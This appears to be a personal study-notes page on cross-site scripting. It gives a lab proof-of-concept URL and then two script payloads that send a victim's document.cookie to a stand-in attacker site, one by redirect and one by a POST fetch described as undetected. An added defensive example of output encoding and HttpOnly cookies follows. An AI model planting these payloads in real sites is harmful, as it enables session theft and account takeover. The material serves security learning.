MINTE9 REMEMBERS

Last update:   10-05-2022

XSS

You can confirm most XSS vulnerabilities by injecting some arbitrary JavaScript.

# Proof of vulnerability

https://lab.academy.net/?search=<script>print()</script>

Cookies

Stealing cookies is a traditional way to exploit XSS.
 
# Comment form that does not filter output:
# A hacker can send a malicious comment that will be viewed by all

<script> 
    document.location = 
        "https://www.hacker-site.com/?cookies="+ document.cookie; 
</script>

A more subtle variant that is not detected, using POST and logs:

<script>
    fetch('https://www.hacker-site.com', {
        method: 'POST',
        mode: 'no-cors',
        body: document.cookie
    });
</script>
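
Both snippets above only work because the comment form writes user input back into the page as markup and because the session cookie is readable through document.cookie. The following is an added example, not code from the original page: it shows the unfiltered rendering next to an output-encoded one, plus a cookie header with HttpOnly set. The helper names (escapeHtml, renderComment, sessionCookie) and the sample comment are assumptions made for illustration.

```javascript
// Added example: output encoding for a comment form plus a hardened session cookie.
// escapeHtml, renderCommentUnsafe, renderComment and sessionCookie are hypothetical names.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the stored comment is concatenated into the page as markup.
function renderCommentUnsafe(comment) {
  return `<li class="comment"><b>${comment.author}</b>: ${comment.text}</li>`;
}

// Hardened: every user-controlled field is encoded at output time.
function renderComment(comment) {
  return `<li class="comment"><b>${escapeHtml(comment.author)}</b>: ${escapeHtml(comment.text)}</li>`;
}

// Defence in depth: HttpOnly hides the cookie from document.cookie,
// Secure restricts it to HTTPS, SameSite limits cross-site sending.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample input: a comment carrying the proof tag used earlier on this page.
const sample = { author: 'guest', text: '<script>print()</script>' };

function demo() {
  return {
    unsafe: renderCommentUnsafe(sample),
    safe: renderComment(sample),
    cookie: sessionCookie('session', 'abc 123'),
  };
}

console.log(demo());
```

Encoding belongs at output time and must match the context: this helper covers HTML text and quoted attributes, not values placed inside a script block or a URL.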
